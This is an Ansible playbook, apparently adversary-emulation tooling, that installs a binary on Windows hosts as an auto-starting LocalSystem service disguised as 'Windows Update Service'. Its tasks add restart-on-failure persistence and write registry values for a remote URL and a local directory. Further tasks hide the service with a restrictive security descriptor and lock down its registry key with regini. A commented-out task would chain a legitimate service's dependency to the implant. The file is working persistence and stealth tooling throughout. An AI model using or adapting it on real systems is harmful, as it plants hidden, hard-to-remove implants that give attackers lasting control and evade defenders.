---
- name: "Download binary, configure service and run commands on Windows"
  hosts: all
  tasks:

    - name: "Copy file from Ansible controller to Windows host"
      win_copy:
        src: "{{ binary_location }}"
        dest: "{{ path_to_download }}"
      tags:
        - copy_file
   
    - name: "Create the service using cmd"
      win_command:
        cmd: sc create "{{ service_name }}" binPath= "{{ path_to_download }}"\\"{{ binary_name }}" start= auto obj= "LocalSystem" DisplayName= "Windows Update Service"
      tags:
        - create_service

    - name: "Add persisstence using service failover"
      win_command:
        cmd: sc failure {{ service_name }} reset= 0 actions= restart/1000
      tags:
        - add_persistence

    - name: "Add registry parameters"
      win_regedit:
        path: "{{ reg_key_param }}{{ service_name }}"
        name: "{{ item.name }}"
        data: "{{ item.value }}"
        type: string
        state: present
      loop:
        - { name: "RemoteUrl", value: "/{{ group_names[0] }}{{ hostvars[inventory_hostname].file_to_download }}" }
        - { name: "LocalDir", value: "{{ path_for_comm }}" }
      tags:
        - reg_params

    # - name: "Change dependency of legitimate service"
    #   win_shell: |
    #     cmd /c "sc config {{ service_for_injection }} depend= {{ service_name }}"
    #   tags:
    #     - add_depend

    - name: "Start the service"
      win_service:
        name: "{{ service_name }}"
        state: started
      tags:
        - start_svc

    - name: "Hide a serivice"
      win_shell:  
        cmd /c sc sdset "{{ service_name }}" "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
      tags:
        - hide_svc

    - name: "Change permissions on registry"
      win_shell: |
        cmd /c "echo {{ reg_restrict }}\\{{ service_name }} [19] > C:\Windows\Temp\set_perm.regini"
        cmd /c "regini C:\Windows\Temp\set_perm.regini"
        cmd /c "del C:\Windows\Temp\set_perm.regini"
      tags:
        - reg_perms